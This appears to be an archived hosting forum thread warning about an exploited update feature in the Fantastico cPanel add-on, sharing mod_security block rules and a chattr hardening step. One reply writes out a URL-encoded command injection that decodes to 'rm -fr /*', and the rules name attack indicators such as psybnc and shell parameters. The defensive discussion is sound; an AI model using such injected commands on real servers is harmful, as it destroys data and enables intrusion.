http://www.netenberg.com/forum/viewtopic.php?t=3399
The basic exploit is fantastico has an update feature which is being exploited. It appears that people are having irc processes being run, the reason for the psybnc rule. It looks like fantastico is going to try and step up thier security, the current versions require chmod 777 on a lot of different files which is what is causing some of these problems.
The following rules have been sugested in that thread:
SecFilter "arta.zip"
SecFilter "cmd=cdx20/var"
SecFilter "master_files"
SecFilter "HCL_path"
SecFilter "clamav-partial"
SecFilter "vi.recover"
SecFilter "netenberg"
SecFilter "pipe.php"
SecFilter "cse.gif"
SecFilter "psybnc"
SecFilter "fantastico_de_luxe"
I personally think they are a little to sensitive since they look in the entire apache requests. I have modified/removed some of the rules to only look at the apache post requests. It appears that these rules should protect the servers from now. I would suggest everybody installs them into mod_security.
SecFilterSelective THE_REQUEST "arta.zip"
SecFilterSelective THE_REQUEST "cmd=cdx20/var"
SecFilterSelective THE_REQUEST "master_files"
SecFilterSelective THE_REQUEST "HCL_path=http"
SecFilterSelective THE_REQUEST "clamav-partial"
SecFilterSelective THE_REQUEST "vi.recover"
SecFilterSelective THE_REQUEST "netenberg"
SecFilterSelective THE_REQUEST "psybnc"
SecFilterSelective THE_REQUEST "fantastico_de_luxe"
I have also updated my guide at http://www.eth0.us/mod_security if you would like to install it. WHM Addon-modules also has support for it.
One further "fix" is to chattr the fantastico files so that they cannot be modified between updates.
chattr -R +i /var/netenberg/fantastico_de_luxe/master_files
If you do this you will have to do chattr -i in order to update fantastico.
Full Version: WARNING! Fantastico is exploitable!
Thanks. Glad I never installed it.
You may want to edit that to say "have to do chattr -R -i in order to update fantastico" so there's no confusion.
This one is funny: "cmd=cdx20/var" so who was the idiot programmer that thought it would be a good idea to let people execute shell commands from a URL ?
If I get it right, I could also do "cmd=rmx20-frx20/*"
For those who don't read URL, "rm -fr /*", or you could do something just as nasty and keep trying different things until the whole site or server is wiped out. I could easily load a short perl program that does just about anything.
I think it would be safer to just remove this not so fantastic thing, you can't block all shell commands. I would be very careful of any program written by people who thought that shell from a URL thing would be OK. You don't know what else is hiding in there.
This one doesn't make sense "vi.recover", are they trying to start vi over a http connection? How does that work?
You may want to edit that to say "have to do chattr -R -i in order to update fantastico" so there's no confusion.
This one is funny: "cmd=cdx20/var" so who was the idiot programmer that thought it would be a good idea to let people execute shell commands from a URL ?
If I get it right, I could also do "cmd=rmx20-frx20/*"
For those who don't read URL, "rm -fr /*", or you could do something just as nasty and keep trying different things until the whole site or server is wiped out. I could easily load a short perl program that does just about anything.
I think it would be safer to just remove this not so fantastic thing, you can't block all shell commands. I would be very careful of any program written by people who thought that shell from a URL thing would be OK. You don't know what else is hiding in there.
This one doesn't make sense "vi.recover", are they trying to start vi over a http connection? How does that work?
The big question beeing...
WHY was nobody alerted the moment they knew this?
Its clear the makers of Fantastico has known this for some time.
WHY was nobody alerted the moment they knew this?
Its clear the makers of Fantastico has known this for some time.
QUOTE (McDuck)
The big question beeing...
WHY was nobody alerted the moment they knew this?
Its clear the makers of Fantastico has known this for some time.
WHY was nobody alerted the moment they knew this?
Its clear the makers of Fantastico has known this for some time.
Because netberg never notified any of the admins, including ev1 to my knowledge.
Thats pretty lame of Netenberg. They should have alerted all their customers at the moment they knew about this. After all, it affects a huge number of servers.
A tip for ev1servers.net;
Dont install fantastico on new boxes before this is resolved... it will just make the cleanup job even bigger.
for my part, fantastico has been uninstalled on all my boxes
A tip for ev1servers.net;
Dont install fantastico on new boxes before this is resolved... it will just make the cleanup job even bigger.
for my part, fantastico has been uninstalled on all my boxes
Thanks for the heads up on this I had no clue about this and just finished upgrading fantastico myself.. To be honest fantastico I see as a joke now and if it were not for all the whining I would here if I removed it I think it would have been gone a long long time ago.
where else could the mod security rules be located on a cpanel server? there not in httpd.conf but when i check /etc/httpd/logs/audit_log i see its actively protecting the system.
thanks
thanks
QUOTE (NextGen)
where else could the mod security rules be located on a cpanel server? there not in httpd.conf but when i check /etc/httpd/logs/audit_log i see its actively protecting the system.
thanks
thanks
I think that is the only way, if you are doing a search for 'mod_se" or something like that in pico make sure you go to about the third find because there are other instances in httpd.conf before it is even used.
Well i searched fully and the rules are not in there. but i found a file called mod-sec.conf which seems to have the rules.i guess its using them from there.
QUOTE (NextGen)
Well i searched fully and the rules are not in there. but i found a file called mod-sec.conf which seems to have the rules.i guess its using them from there.
Yes that is where cPanel installs the mod-sec rules. They can be placed anywhere in the httpd.conf or in a Include file, like is the case for how cPanel installs mod_security.
Wonderful as always. Thanks for the heads up eth00.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.